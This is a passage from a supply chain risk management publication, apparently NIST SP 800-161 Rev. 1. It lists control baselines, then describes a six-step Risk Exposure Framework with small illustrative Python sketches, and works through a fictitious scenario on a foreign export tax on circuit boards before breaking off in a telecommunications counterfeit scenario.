System Component Inventory | Accountability
Information
x
CM-8(6)
System Component Inventory | Assessed
Configurations and Approved Deviations
x
CM-8(7)
System Component Inventory | Centralized Repository
x
CM-8(8)
System Component Inventory | Automated Location
Tracking
x
x
CM-8(9)
System Component Inventory | Assignment of
Components to Systems
x
CM-9
Configuration Management Plan
x
x
x
CM-9(1)
Configuration Management Plan | Assignment of
Responsibility
x
x
CM-10
Software Usage Restrictions
x
x
x
CM-10(1)
Software Usage Restrictions | Open source Software
x
x
CM-11
User-installed Software
x
x
x
CM-12
Information Location
x
x
CM-12(1)
Information Location | Automated Tools to Support
Information Location
x
x
CM-13
Data Action Mapping
x
x
CM-14
Signed Components
x
CP-1
Policy and Procedures
x
x
x
x
CP-2
Contingency Plan
x
x
x
CP-2(1)
Contingency Plan | Coordinate with Related Plans
x
x
CP-2(2)
Contingency Plan | Capacity Planning
x
x
CP-2(7)
Contingency Plan | Coordinate with External Service
Providers
x
x
CP-2(8)
Contingency Plan | Identify Critical Assets
x
CP-3
Contingency Training
x
x
x
x
CP-3(1)
Contingency Training | Simulated Events
x
x
CP-4
Contingency Plan Testing
x
x
x
CP-6
Alternative Storage Site
x
x
CP-6(1)
Alternative Storage Site | Separation from Primary
Site
x
x
CP-7
Alternative Processing Site
x
x
CP-8
Telecommunications Services
x
x
CP-8(3)
Telecommunications Services | Separation of Primary
and Alternative Providers
x
x
CP-8(4)
Telecommunications Services | Provider Contingency
Plan
x
x
CP-11
Alternative Communications Protocols
x
x
IA-1
Policy and Procedures
x
x
x
x
IA-2
Identification and Authentication (Organizational
Users)
x
x
x
x
x
IA-3
Device Identification and Authentication
x
x
x
IA-4
Identifier Management
x
x
x
x
IA-4(6)
Identifier Management | Cross-organization
Management
x
x
x
IA-5
Authenticator Management
x
x
x
x
IA-5(5)
Authenticator Management | Change Authenticators
Prior to Delivery
x
IA-5(9)
Authenticator Management | Federated Credential
Management
x
IA-8
Identification and Authentication (Non-
organizational Users)
x
x
x
IA-9
Service Identification and Authentication
x
x
x
IR-1
Policy and Procedures
x
x
x
x
x
IR-2
Incident Response Training
x
x
x
x
IR-3
Incident Response Testing
x
x
IR-4(6)
Incident Handling | Insider Threats
x
x
x
IR-4(7)
Incident Handling | Insider Threats — Intra-
organization Coordination
x
x
x
IR-4(10)
Incident Handling | Supply Chain Coordination
x
x
IR-4(11)
Incident Handling | Integrated Incident Response
Team
x
IR-5
Incident Monitoring
x
x
x
IR-6(3)
Incident Reporting | Supply Chain Coordination
x
x
IR-7(2)
Incident Response Assistance | Coordination with
External Providers
x
x
IR-8  Incident Response Plan  [x x x x]
IR-9  Information Spillage Response  [x x]
MA-1  Policy and Procedures  [x x x x x]
MA-2(2)  Controlled Maintenance | Automated Maintenance Activities  [x]
MA-3  Maintenance Tools  [x x]
MA-3(1)  Maintenance Tools | Inspect Tools  [x]
MA-3(2)  Maintenance Tools | Inspect Media  [x]
MA-3(3)  Maintenance Tools | Prevent Unauthorized Removal  [x]
MA-4  Nonlocal Maintenance  [x x x x]
MA-4(3)  Nonlocal Maintenance | Comparable Security and Sanitization  [x x]
MA-5  Maintenance Personnel  [x x x]
MA-5(4)  Maintenance Personnel | Foreign Nationals  [x x x]
MA-6  Timely Maintenance  [x]
MA-7  Field Maintenance  [x]
MA-8  Maintenance Monitoring and Information Sharing  [x]
MP-1  Policy and Procedures  [x x x]
MP-4  Media Storage  [x x x]
MP-5  Media Transport  [x x]
MP-6  Media Sanitization  [x x x x]
PE-1  Policy and Procedures  [x x x x]
PE-2  Physical Access Authorizations  [x x x x]
PE-2(1)  Physical Access Authorizations | Access by Position or Role  [x x]
PE-3  Physical Access Control  [x x x]
PE-3(1)  Physical Access Control | System Access  [x x]
PE-3(2)  Physical Access Control | Facility and Systems  [x x]
PE-3(5)  Physical Access Control | Tamper Protection  [x x]
PE-6  Monitoring Physical Access  [x x x x]
PE-16  Delivery and Removal  [x x]
PE-17  Alternative Work Site  [x]
PE-18  Location of System Components  [x x x]
PE-20  Asset Monitoring and Tracking  [x x]
PE-23  Facility Location  [x x x]
PL-1  Policy and Procedures  [x x]
PL-2  System Security and Privacy Plans  [x x x]
PL-4  Rules of Behavior  [x x x]
PL-7  Concept of Operations  [x]
PL-8  Security and Privacy Architectures  [x x]
PL-8(2)  Security and Privacy Architectures | Supplier Diversity  [x x]
PL-9  Central Management  [x x]
PL-10  Baseline Selection  [x x x]
PM-2  Information Security Program Leadership Role  [x x]
PM-3  Information Security and Privacy Resources  [x x]
PM-4  Plan of Action and Milestones Process  [x x]
PM-5  System Inventory  [x x x]
PM-6  Measures of Performance  [x x]
PM-7  Enterprise Architecture  [x x]
PM-8  Critical Infrastructure Plan  [x]
PM-9  Risk Management Strategy  [x]
PM-10  Authorization Process  [x x]
PM-11  Mission and Business Process Definition  [x x x]
PM-12  Insider Threat Program  [x x x]
PM-13  Security and Privacy Workforce  [x x]
PM-14  Testing, Training, and Monitoring  [x x]
PM-15  Security and Privacy Groups and Associations  [x x]
PM-16  Threat Awareness Program  [x x]
PM-17  Protecting Controlled Unclassified Information on External Systems  [x]
PM-18  Privacy Program Plan  [x x x]
PM-19  Privacy Program Leadership Role  [x]
PM-20  Dissemination of Privacy Program Information  [x x]
PM-21  Accounting of Disclosures  [x x]
PM-22  Personally Identifiable Information Quality Management  [x x]
PM-23  Data Governance Body  [x]
PM-25  Minimization of Personally Identifiable Information Used in Testing, Training, and Research  [x]
PM-26  Complaint Management  [x x]
PM-27  Privacy Reporting  [x x]
PM-28  Risk Framing  [x]
PM-29  Risk Management Program Leadership Roles  [x]
PM-30  Supply Chain Risk Management Strategy  [x x]
PM-31  Continuous Monitoring Strategy  [x x x]
PM-32  Purposing  [x x]
PS-1  Policy and Procedures  [x x x x x]
PS-3  Personnel Screening  [x x x x]
PS-6  Access Agreements  [x x x x]
PS-7  External Personnel Security  [x x]
PT-1  Policy and Procedures  [x x x x]
RA-1  Policy and Procedures  [x x x x]
RA-2  Security Categorization  [x x x x]
RA-3  Risk Assessment  [x x x x]
RA-5  Vulnerability Monitoring and Scanning  [x x x x]
RA-5(3)  Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage  [x x]
RA-5(6)  Vulnerability Monitoring and Scanning | Automated Trend Analyses  [x x]
RA-7  Risk Response  [x x x x]
RA-9  Criticality Analysis  [x x x x]
RA-10  Threat Hunting  [x x x]
SA-1  Policy and Procedures  [x x x x]
SA-2  Allocation of Resources  [x x x]
SA-3  System Development Life Cycle  [x x x x]
SA-4  Acquisition Process  [x x x x]
SA-4(5)  Acquisition Process | System, Component, and Service Configurations  [x]
SA-4(7)  Acquisition Process | NIAP-approved Protection Profiles  [x x]
SA-4(8)  Acquisition Process | Continuous Monitoring Plan for Controls  [x x]
SA-5  System Documentation  [x x]
SA-8  Security and Privacy Engineering Principles  [x x x x]
SA-9(1)  External System Services | Risk Assessments and Organizational Approvals  [x x]
SA-9(3)  External System Services | Establish and Maintain Trust Relationship with Providers  [x x x]
SA-9(4)  External System Services | Consistent Interests of Consumers and Providers  [x]
SA-9(5)  External System Services | Processing, Storage, and Service Location  [x]
SA-10  Developer Configuration Management  [x x]
SA-11  Developer Testing and Evaluation  [x x x]
SA-15  Development Process, Standards, and Tools  [x x]
SA-15(3)  Development Process, Standards, and Tools | Criticality Analysis  [x x]
SA-15(4)  Development Process, Standards, and Tools | Threat Modeling and Vulnerability Analysis  [x x]
SA-15(8)  Development Process, Standards, and Tools | Reuse of Threat and Vulnerability Information  [x]
SA-16  Developer-provided Training  [x x]
SA-17  Developer Security and Privacy Architecture and Design  [x x]
SA-20  Customized Development of Critical Components  [x x]
SA-21  Developer Screening  [x x x]
SA-21(1)  Developer Screening | Validation of Screening  [x x]
SA-22  Unsupported System Components  [x x x]
SC-1  Policy and Procedures  [x x x x]
SC-4  Information in Shared System Resources  [x x]
SC-5(2)  Denial-of-service Protection | Capacity, Bandwidth, and Redundancy  [x]
SC-7  Boundary Protection  [x x x]
SC-7(13)  Boundary Protection | Isolation of Security Tools, Mechanisms, and Support Components  [x x]
SC-7(14)  Boundary Protection | Protect Against Unauthorized Physical Connections  [x x]
SC-7(19)  Boundary Protection | Block Communication from Non-organizationally Configured Hosts  [x]
SC-8  Transmission Confidentiality and Integrity  [x x x]
SC-18  Mobile Code  [x]
SC-18(2)  Mobile Code | Acquisition, Development, and Use  [x]
SC-27  Platform-independent Applications  [x x]
SC-28  Protection of Information at Rest  [x x x]
SC-29  Heterogeneity  [x x]
SC-30  Concealment and Misdirection  [x x]
SC-30(2)  Concealment and Misdirection | Randomness  [x x]
SC-30(3)  Concealment and Misdirection | Change Processing and Storage Locations  [x x]
SC-30(4)  Concealment and Misdirection | Misleading Information  [x x]
SC-30(5)  Concealment and Misdirection | Concealment of System Components  [x x]
SC-36  Distributed Processing and Storage  [x x x]
SC-37(1)  Out-of-band Channels | Ensure Delivery and Transmission  [x x]
SC-38  Operations Security  [x x]
SC-47  Alternative Communications Paths  [x x x]
SI-1  Policy and Procedures  [x x x x]
SI-2  Flaw Remediation  [x x x x]
SI-2(5)  Flaw Remediation | Automatic Software and Firmware Updates  [x]
SI-3  Malicious Code Protection  [x x x x]
SI-4  System Monitoring  [x x x x x]
SI-4(17)  System Monitoring | Integrated Situational Awareness  [x x]
SI-4(19)  System Monitoring | Risk for Individuals  [x x]
SI-5  Security Alerts, Advisories, and Directives  [x x x x x]
SI-7  Software, Firmware, and Information Integrity  [x x x x]
SI-7(14)  Software, Firmware, and Information Integrity | Binary or Machine Executable Code  [x x]
SI-7(15)  Software, Firmware, and Information Integrity | Code Authentication  [x]
SI-12  Information Management and Retention  [x x]
SI-20  Tainting  [x x x]
SR-1  Policy and Procedures  [x x x x]
SR-2  Supply Chain Risk Management Plan  [x x]
SR-3  Supply Chain Controls and Processes  [x x x x]
SR-3(1)  Supply Chain Controls and Processes | Diverse Supply Base  [x x]
SR-3(3)  Supply Chain Controls and Processes | Sub-tier Flow Down  [x x x]
SR-4  Provenance  [x x]
SR-5  Acquisition Strategies, Tools, and Methods  [x x x x]
SR-6  Supplier Assessments and Reviews  [x x]
SR-7  Supply Chain Operations Security  [x x]
SR-8  Notification Agreements  [x x x]
SR-9  Tamper Resistance and Detection  [x x]
SR-10  Inspection of Systems or Components  [x x x x]
SR-11  Component Authenticity  [x x x x]
SR-11(1)  Component Authenticity | Anti-counterfeit Training  [x x x]
SR-11(2)  Component Authenticity | Configuration Control for Component Service and Repair  [x x x]
SR-11(3)  Component Authenticity | Anti-counterfeit Scanning  [x x]
SR-12  Component Disposal  [x x x]
SR-13  Supplier Inventory  [x x]
APPENDIX C: RISK EXPOSURE FRAMEWORK [38]
There are numerous opportunities for vulnerabilities that impact the enterprise environment or
the system/element to be intentionally or unintentionally inserted, created, or exploited
throughout the supply chain. The exploitation of these vulnerabilities is known as a supply chain
threat event. A Threat Scenario is a set of discrete threat events associated with a specific
potential or identified existing threat source or multiple threat sources, partially ordered in time.
Developing and analyzing threat scenarios can help enterprises have a more comprehensive
understanding of the various types of threat events that can occur and lay the groundwork for
analyzing the likelihood and impact that a specific event or events would have on an enterprise.
Conducting this analysis is a useful way to discover gaps in controls and to identify and prioritize
appropriate mitigating strategies. [39]
Threat scenarios are generally used in two ways:
1. To translate the often disconnected information garnered from a risk assessment, as
described in [NIST SP 800-30, Rev. 1], into a more narrowly scoped and tangible story-like
situation for further evaluation. These stories can help enterprises discover
dependencies and additional vulnerabilities that require mitigation and are used for
training.
2. To determine the impact that a successful exercise of a specific vulnerability would have
on the enterprise and identify the benefits of mitigating strategies.
Threat scenarios serve as a critical component of the enterprise’s cybersecurity supply chain risk
management process described in Appendix G of this publication. An enterprise forms a threat
scenario to analyze a disparate set of threat and vulnerability conditions to assemble a cohesive
story that can be analyzed as part of a risk assessment. With a threat scenario defined, the
enterprise can complete a risk assessment to understand how likely the scenario is and what
would happen (i.e., the impact) as a result. Ultimately, the analyzed components of a threat
scenario are used to reach a risk determination that represents the conclusion of an enterprise’s
level of exposure to cybersecurity risks throughout the supply chain.
Once a risk determination has been made, the enterprise will determine a path for responding to
the risk using the Risk Exposure Framework. Within the Risk Exposure Framework, enterprises
will document the threat scenario, the risk analysis, the identified risk response strategy, and any
associated C-SCRM controls.
This appendix provides an example of a Risk Exposure Framework for C-SCRM that can be
used by enterprises to develop a tailored Risk Exposure Framework for potential and identified
threats that best suits their needs. It contains six examples of how this framework may be used.
The examples differ slightly in their implementation of the framework so as to show how the
framework may be tailored by an enterprise. Each example identifies one or more vulnerabilities,
describes a specific threat source, identifies the expected impact on the enterprise, and proposes
[SP 800-161, Rev. 1] C-SCRM controls that would help mitigate the resulting risk.

[38] Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
[39] Additional example threat scenarios and threat lists can be found in the ICT SCRM Task Force: Threat Scenarios Report (v3), August 2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015 version of NIST SP 800-161.
RISK EXPOSURE FRAMEWORK
Step 1: Create a Plan for Developing and Analyzing Threat Scenarios
• Identify the purpose of the threat scenario analysis in terms of the objectives, milestones,
and expected deliverables.
• Identify the scope of enterprise applicability, level of detail, and other constraints.
• Identify resources to be used, including personnel, time, and equipment.
• Define a Risk Exposure Framework to be used for analyzing scenarios.
Step 2: Characterize the Environment
• Identify core mission and business processes and key enterprise dependencies.
• Describe threat sources that are relevant to the enterprise. Include the motivation and
resources available to the threat source, if applicable.
• List known vulnerabilities or areas of concern. (Note: Areas of concern include the
planned outsourcing of a manufacturing plant, the pending termination of a maintenance
contract, or the discontinued manufacture of an element).
• Identify existing and planned controls.
• Identify related regulations, standards, policies, and procedures.
• Define an acceptable level of risk (risk threshold) per the enterprise’s assessment of
Tactics, Techniques, and Procedures (TTPs); system criticality; and a risk owner’s set of
mission or business priorities. The level of risk or risk threshold can be periodically
revisited and adjusted to reflect the elasticity of the global supply chain, enterprise
changes, and new mission priorities.
Step 3: Develop and Select Threat Events for Analysis
• List possible ways that threat sources could exploit known vulnerabilities or impact areas
of concern to create a list of events. (Note: Historical data is useful for determining this
information.)
• Briefly outline the series of consequences that could occur as a result of each threat event.
These may be as broad or specific as necessary. If applicable, estimate the likelihood and
impact of each event.
• Eliminate those events that are clearly outside of the defined purpose and scope of the
analysis.
• In more detail, describe the remaining potential threat events. Include the TTPs that a
threat source may use to carry out attacks. (Note: The level of detail in the description is
dependent on the needs of the enterprise.)
• Select for analysis those events that best fit the defined purpose and scope of the analysis.
More likely or impactful events, areas of concern to the enterprise, and an event that can
represent several of the other listed events are generally useful candidates.
Step 4: Conduct an Analysis Using the Risk Exposure Framework
• For each threat event, note any immediate consequences of the event and identify those
enterprise units and processes that would be affected, taking into account applicable
regulations, standards, policies, and procedures; existing and planned controls; and the
extent to which those controls are able to effectively prevent, withstand, or otherwise
mitigate the harm that could result from the threat event.
• Estimate the impact that these consequences would have on the mission and business
processes, information, assets, enterprise units, and other stakeholders affected,
preferably in quantitative terms from historical data and taking into account existing and
planned controls and applicable regulations, standards, policies, and procedures. (Note: It
may be beneficial to identify a “most likely” impact level and a “worst-case” or “100-year”
impact level.)
• Identify those enterprise units, processes, information (access or flows), and/or assets that
may or would be subsequently affected, as well as the consequences and impact levels
until each affected critical item has been analyzed, taking into account existing and
planned controls and applicable regulations, standards, policies, and procedures (e.g., if a
critical server goes down, one of the first processes affected may be the technology
support department, but if they determine that a new part is needed to bring the server
back up, the procurement department may become involved).
Step 5: Determine C-SCRM Applicable Controls
• Determine if and which threat scenario events create a risk level that exceeds a risk
owner’s acceptable level of risk (risk threshold). (Note: In some cases, the level of
acceptable risk may be dependent on the capability to implement or the cost of mitigating
strategies.) Identify opportunities to strengthen existing controls or potential new
mitigating controls. Using a list of standards or recommended controls can simplify this
process. This appendix uses the controls in Appendix A of this document.
• Estimate the effectiveness of existing and planned controls at reducing the risk of a
scenario.
• Estimate the capability and resources needed (in terms of money, personnel, and time) to
implement potential new or strengthened controls.
• Identify those C-SCRM controls or combinations of C-SCRM controls that could cause
the estimated residual risk of a threat event to drop to an acceptable level in the most
resource-effective manner, taking into account any rules or regulations that may apply.
(Note: Consider the potential that one control will help mitigate the risk of more than one
event or that a control may increase the risk of a separate event.)
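To make the selection step above concrete, the short Python sketch below greedily picks the control with the best estimated risk reduction per dollar until the residual risk drops under the threshold. It is a minimal illustration, not a method prescribed by this publication: the control names, costs, and risk-reduction figures are hypothetical stand-ins for the estimates an enterprise would produce in Steps 4 and 5, and a simple greedy pass ignores the control interactions noted in the final bullet.

    # Illustrative greedy control selection for Step 5 (hypothetical figures).
    candidates = {
        "SR-6 Supplier Assessments and Reviews": {"cost": 50_000, "risk_reduction": 1_500_000},
        "SR-4 Provenance": {"cost": 80_000, "risk_reduction": 1_000_000},
        "PL-8(2) Supplier Diversity": {"cost": 200_000, "risk_reduction": 2_000_000},
    }

    def select_controls(candidates, current_risk, threshold):
        """Greedily pick controls by risk reduction per dollar until under threshold."""
        selected, remaining = [], dict(candidates)
        while current_risk > threshold and remaining:
            best = max(remaining, key=lambda c: remaining[c]["risk_reduction"] / remaining[c]["cost"])
            current_risk = max(0, current_risk - remaining.pop(best)["risk_reduction"])
            selected.append(best)
        return selected, current_risk

    chosen, residual = select_controls(candidates, current_risk=4_000_000, threshold=1_000_000)
    print(chosen)    # controls in the order selected
    print(residual)  # estimated residual risk after applying them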
Step 6: Evaluate/Feedback
• Develop a plan to implement the selected controls and evaluate their effectiveness.
• Evaluate the effectiveness of the Risk Exposure Framework, and make improvements as needed.
Table C-1: Sample Risk Exposure Framework

Threat Scenario
• Threat Event Description: Describe possible ways that threat sources could exploit known vulnerabilities or impact areas of concern to create a list of events. (Threat event: An event or situation that has the potential for causing undesirable consequences or impact.)
• Threat Event Outcome: Describe the outcome of the threat event. (Threat event outcome: The effect that a threat acting upon a vulnerability has on the confidentiality, integrity, and/or availability of the enterprise’s operations, assets, and/or individuals.)
• Enterprise units, processes, information, assets, or stakeholders affected: List the affected enterprise units, processes, information, assets, or stakeholders.

Risk
• Impact: Enter an estimate of the impact, loss, or harm that would result from the threat event materializing to affect the mission and business processes, information assets, or stakeholders. Estimates should preferably be provided in quantitative terms based on historical data and should take into account existing and planned controls and applicable regulations, standards, policies, and procedures. (Note: It may be beneficial to identify a “most likely” impact level and a “worst-case” or “100-year” impact level.) (Impact: The effect on enterprise operations, enterprise assets, individuals, other enterprises, or the Nation (including the national security interests of the United States) of a loss of confidentiality, integrity, or availability of information or a system.)
• Likelihood: Enter the likelihood that a specific event or events may occur. (Likelihood: Chance of something happening.)
• Risk Exposure (Impact x Likelihood): Enter the risk score by multiplying impact x likelihood. (Risk exposure: A measure of the extent to which an entity is threatened by a potential circumstance or event, typically a function of (i) the adverse impacts that would arise if the circumstance or event occurs and (ii) the likelihood of occurrence.)
• Acceptable Level of Risk: Define an acceptable level of risk (risk threshold) per the enterprise’s assessment of Tactics, Techniques, and Procedures (TTPs); system criticality; risk appetite and tolerance; and a risk owner’s set of strategic goals and objectives. (Acceptable risk: A level of residual risk to the enterprise’s operations, assets, or individuals that falls within the risk appetite and risk tolerance statements set by the enterprise.)

Mitigation
• Potential Mitigating Strategies and C-SCRM Controls: List the potential risk mitigation strategies and any relevant C-SCRM controls. (C-SCRM risk mitigation: A systematic process for managing exposures to cybersecurity risk in supply chains, threats, and vulnerabilities throughout the supply chain and developing risk response strategies to the cybersecurity risks throughout the supply chain.)
• Estimated Cost of Mitigating Strategies: Enter the estimated cost of risk mitigation strategies.
• Change in Likelihood: Identify potential changes in likelihood.
• Change in Impact: Identify potential changes in impact.
• Selected Strategies: List selected strategies to reduce impact.
• Estimated Residual Risk: Enter the estimated amount of residual risk. (Residual risk: The portion of risk that remains after security measures have been applied.)
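Because Table C-1 amounts to a record layout, it can be captured directly as a small data structure. The Python sketch below is illustrative only: the field names mirror the table, the risk_exposure property implements the Impact x Likelihood product, and the sample values are the Scenario 1 figures from Table C-2 (the single-number acceptable_risk threshold is a simplification of that table's probabilistic risk statement).

    from dataclasses import dataclass, field
    from typing import List

    @dataclass
    class ThreatScenario:
        """One entry in a tailored Risk Exposure Framework (fields mirror Table C-1)."""
        threat_event_description: str
        threat_event_outcome: str
        affected: List[str]           # enterprise units, processes, assets, stakeholders
        impact: float                 # estimated loss in dollars (or a 0-10 score)
        likelihood: float             # probability of occurrence, 0.0-1.0
        acceptable_risk: float        # risk threshold, same units as the exposure
        mitigations: List[str] = field(default_factory=list)

        @property
        def risk_exposure(self) -> float:
            # Table C-1: Risk Exposure = Impact x Likelihood
            return self.impact * self.likelihood

        def exceeds_threshold(self) -> bool:
            return self.risk_exposure > self.acceptable_risk

    # Scenario 1 figures from Table C-2: $40M impact at a 10 % annualized likelihood.
    s1 = ThreatScenario(
        threat_event_description="20 % export tax imposed on PCBs from a single-country supply base",
        threat_event_outcome="PC margins erode from 13.5 % to 4.5 %",
        affected=["Procurement", "PC product line"],
        impact=40_000_000,
        likelihood=0.10,
        acceptable_risk=1_000_000,    # illustrative threshold
    )
    print(s1.risk_exposure)           # 4000000.0, the ~$4,000,000 exposure in Table C-2
    print(s1.exceeds_threshold())     # True, so mitigation is required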
SAMPLE SCENARIOS
This appendix provides six example threat scenarios specific to the U.S. Government using a
fictitious ‘ABC Company’ and the Risk Exposure Framework described above. The examples
purposely vary in their level of specificity and detail to show that threat scenarios can be as
broad or specific – as detailed or generic – as necessary. While these scenarios use percentages
and basic scoring measures (i.e., High, Moderate, Low) for likelihood, impact, and risk,
enterprises may use any number of different units of measure (e.g., CVSS score). Additionally,
these scenarios vary slightly in their implementation of the risk response framework to show that
the Risk Exposure Framework can be adapted as needed.
SCENARIO 1: Influence or Control by Foreign Governments Over Suppliers [40]
Background
An enterprise has decided to perform a threat scenario analysis of its printed circuit board (PCB)
suppliers. The scenario will focus on the sensitivity of the business to unforeseen fluctuations in
component costs.
Threat Source
ABC Company designs, assembles, and ships 3.5 million personal computers per year. It has a
global footprint both in terms of customer and supply bases. Five years ago, in an effort to
reduce the cost of goods sold, ABC Company shifted a majority of its PCB procurement to
Southeast Asia. To avoid being single-sourced, ABC Company finalized agreements with five
different suppliers within the country and has enjoyed a positive partnership with each during
this time.
Vulnerability
Though sourcing from multiple vendors, ABC Company relies on suppliers in a single country
(i.e., Southeast Asia). This exposes ABC Company to geopolitical threats due to the potential for
policies of a single government to have a dramatic impact on the availability of supplied inputs.
Threat Event Description
The enterprise has established the following fictitious threat for the analysis exercise: Last year,
new leadership took over the government of the country where ABC Company does most of
their PCB business. This leadership has been focused on improving the financial and business
environment within the country, allowing larger firms who set up headquarters and other major
centers within the country advantages to do business more easily and cost-efficiently with
suppliers within the same region. However, in February of 2019, the now-corrupt regime passed
new legislation that established an additional 20 % tax on all electronic components and goods
sold outside of the country. This new law was to take effect on June 1, 2019.

[40] Scenario 1 prose is slightly modified (e.g., changed company names) from ICT SCRM Task Force: Threat Scenarios Report (v3), August 2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015 version of NIST SP 800-161.
When the new law was announced, ABC Company’s current inventory of PCBs was about 10 %
of yearly demand, which was the typical inventory level with which they were comfortable.
Before June, ABC Company reached out to all five suppliers to order additional materials, but
there was quickly a shortage due to higher demand from many foreign customers of these
products. By June 1, the day that the new tax law took effect, ABC Company had reached an
inventory level of up to 15 % of yearly demand.
Outcome
Between February and June of 2019, ABC Company considered partnerships with new suppliers,
but there were several issues identified. One in every 10 new suppliers that ABC Company
contacted required a lead time for ramping up to the desired demand of anywhere from 6 months
to 18 months. This would have necessitated additional work on ABC Company’s part, including
testing samples of the supplier PCBs, finalizing logistical details, and monitoring supplier-side
activities, such as the procurement of raw materials and the acquisition of additional personnel
and production space that were necessary to meet the new demand.
The second issue was that the current contracts with all five suppliers in Southeast Asia involved
meeting minimum demand requirements, meaning that ABC Company was committed to
purchasing a minimum of 100,000 PCBs per month for the duration of the contracts, which
ranged anywhere from 3 months to 24 months in length. This would mean that ABC Company
could not easily avoid the cost implications of the new tax. Could ABC Company absorb the cost
of the PCBs? With a 20 % cost increase, this eroded the margins of a PC from 13.5 % down to
4.5 % on average. For some of the lower-margin ABC Company offerings, it would likely result
in discontinuing the line and using the more expensive PCBs on higher-end models that could
carry more margin.
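As a rough cross-check of the figures above (a back-of-the-envelope sketch under an assumption the text does not state, namely that selling prices stay fixed and the entire tax comes out of margin): a 9-point margin erosion caused by a 20 % PCB cost increase implies that PCBs account for roughly 45 % of a PC's selling price.

    # Back-of-the-envelope check of the quoted margin erosion.
    # Assumption (not stated in the scenario): selling prices are held constant,
    # so the full 20 % PCB cost increase is absorbed by the margin.
    margin_before = 0.135    # 13.5 % average margin
    margin_after = 0.045     # 4.5 % average margin after the tax
    tax_rate = 0.20

    margin_loss = margin_before - margin_after   # 0.09 of the selling price
    pcb_cost_share = margin_loss / tax_rate      # 0.45
    print(f"Implied PCB share of selling price: {pcb_cost_share:.0%}")   # 45%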
Enterprise Units and Processes Affected
N/A
Potential Mitigating Strategies and C-SCRM Controls
• Perform regular assessments and reviews of supplier risk. [41]
• Diversify suppliers by immediate location, as well as by country, region, and other
factors.
• Build cost implications into supplier contracts, making it easier to part ways with
suppliers when costs rise too high (whether by fault of the supplier or otherwise).
• Adjust desired inventory levels to better account for an unexpected shortage of demand at
critical times.
• Employ more resources in countries or regions of critical suppliers with the intent to
source advanced notice of new legislation that may negatively affect business.

[41] The regular assessment and review of the supplier risk mitigating strategy was added to the original Scenario 1 text from the ICT SCRM Task Force: Threat Scenarios Report (v3), August 2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015 version of NIST SP 800-161.
Table C-2: Scenario 1

Threat Scenario
• Threat Source: Dynamic geopolitical conditions that impact the supply of production components for PCs.
• Vulnerability: Geographical concentration of suppliers for a key production component.
• Threat Event Description: ABC Company shifted a majority of its printed circuit board (PCB) procurement to Southeast Asia to reduce the cost of goods sold. In an effort to avoid being single-sourced, ABC Company finalized agreements with five different suppliers within the country. The country in which ABC Company conducts most of their PCB business has seen a new regime assume governmental authority. In February of 2019, this now-corrupt regime passed legislation establishing an additional 20 % tax on all electronic components and goods sold outside of the country. This law was to take effect on June 1, 2019. When the new law was announced, the current ABC Company inventory of PCBs was about 10 % of yearly demand, at the typical level of inventory with which they were comfortable. Before June, ABC Company reached out to all five suppliers to order additional materials, but there was quickly a shortage due to the higher demand. By June 1, the day the new tax law took effect, ABC Company had reached an inventory level up to 15 % of annual demand.
• Threat Event Outcome: ABC Company also considered partnering with new suppliers, but there were issues identified with this approach. One out of every 10 new suppliers to which ABC Company reached out required a lead time to ramp up to desired demand of anywhere from 6 months to 18 months. Additionally, current contracts with all five active suppliers in Southeast Asia stipulated minimum demand requirements, meaning that ABC Company was committed to purchasing a minimum of 100,000 PCBs per month for the duration of the contracts, which ranged anywhere from 3 months to 24 months in length. This would mean that ABC Company could not easily avoid the cost implications of the new tax. With a 20 % cost increase, the margins of a PC eroded from 13.5 % to 4.5 %, on average.
• Enterprise units / processes affected: N/A

Risk
• Impact: High: $40,000,000 decline in PC product line profit.
• Likelihood: Moderate: 10 % annualized probability of occurrence.
• Risk Exposure (Impact x Likelihood): High: Inherent risk exposure equal to approx. $4,000,000 in product line profit.
• Acceptable Level of Risk: No greater than 10 % probability of greater than $10,000,000 in product line profit.

Mitigation
• Potential Mitigating Strategies and C-SCRM Controls: Assess and review supplier risk to include FOCI [SR-6(1)], employ supplier diversity requirements [C-SCRM_PL-3(1)], employ supplier diversity [C-SCRM_PL-8(2)], and adjust inventory levels [CM-8]. Specifically:
  - Perform regular assessments and reviews of supplier risk.
  - Diversify suppliers by immediate location, as well as by country, region, and other factors.
  - Build cost implications into supplier contracts, making it easier to walk away from suppliers when costs rise too high (whether it is the fault of the supplier or not).
  - Adjust desired inventory levels to better account for unexpected shortages of demand at critical times.
  - Employ more resources in countries or regions of critical suppliers with the intent to source advanced notice of new legislation that may negatively affect business.
• Estimated Cost of Mitigating Strategies: N/A
• Change in Likelihood: Low: 10 % probability of occurrence.
• Change in Impact: Moderate: $2,000,000 in product line profit.
• Selected Strategies: Combination of strategies using the mitigation noted.
• Estimated Residual Risk: Low: Residual risk exposure of 0.02 % of PC product line profit margin.
SCENARIO 2: Telecommunications Counterfeits
Background
A large enterprise, ABC Company, has developed a system that is maintained by contract with
an external integration company. The system requires a common telecommunications element
that is no longer available from the original equipment manufacturer (OEM). The OEM has
offered a newer product as a replacement, which would require modifications to the system at a
cost of approximately $1 million. If the element is not upgraded, the agency and system
integrator would have to rely on secondary market suppliers for replacements. The newer
product provides no significant improvement on the element currently being used.
ABC Company has decided to perform a threat scenario analysis to determine whether to modify
the system to accept the new product or accept the risk of continuing to use a product that is no
longer in production.
Environment
The environment is characterized as follows:
• The system is expected to last 10 more years without any major upgrades or
modifications and has a 99.9 % uptime requirement.
• Over 1,000 of the $200 elements are used throughout the system, and approximately 10
% are replaced every year due to regular wear-and-tear, malfunctions, or other reasons.
The integrator has an approximate 3-month supply on hand at any given time.
• The element is continuously monitored for functionality, and efficient procedures exist to
reroute traffic and replace the element should it unexpectedly fail.
• Outages resulting from the unexpected failure of the element are rare, localized, and last
only a few minutes. More frequently, when an element fails, the system’s functionality is
severely reduced for approximately one to four hours while the problem is diagnosed and
fixed or the element replaced.
• Products such as the element in question have been a common target for counterfeiting.
• The integrator has policies that restrict the purchase of counterfeit goods and a procedure
to follow if a counterfeit is discovered [Ref. SR-11].
• The integrator and acquiring agency have limited testing procedures to ensure
functionality of the element before acceptance [Ref. SR-5(2)].
Threat Event
